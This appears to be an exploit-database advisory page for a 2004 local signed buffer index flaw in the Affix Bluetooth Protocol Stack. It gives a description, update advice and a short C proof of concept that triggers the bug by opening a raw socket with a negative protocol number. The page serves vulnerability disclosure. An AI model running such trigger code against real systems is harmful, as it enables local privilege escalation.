Nokia Affix Bluetooth Signed Buffer Index Vulnerability

vendor:

Affix Bluetooth Protocol Stack

by:

kf_lists[at]digitalmunition[dot]com

7.2

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Affix Bluetooth Protocol Stack

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2004

Nokia Affix Bluetooth Signed Buffer Index Vulnerability

A local signed buffer index vulnerability affects Affix Bluetooth Protocol Stack. This issue is due to a failure of the affected utility to properly handle user-supplied buffer size parameters. This issue may be leveraged by a local attacker to gain escalated privileges on an affected computer.

Mitigation:

Update to the latest version of the Affix Bluetooth Protocol Stack.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/13347/info

A local signed buffer index vulnerability affects Affix Bluetooth Protocol Stack. This issue is due to a failure of the affected utility to properly handle user-supplied buffer size parameters.

This issue may be leveraged by a local attacker to gain escalated privileges on an affected computer. 

/*
        Nokia Affix Bluetooth Signed Buffer Index PoC
        - kf_lists[at]digitalmunition[dot]com
*/


#include <sys/socket.h>
#include <affix/bluetooth.h>
#include <affix/hci_cmds.h>
#include <affix/hci_types.h>

main()
{
       int ctl;


       if ((ctl = socket(PF_AFFIX, SOCK_RAW, -31337)) < 0)
       {
               perror("Something went wrong?");
               exit(1);
       }
}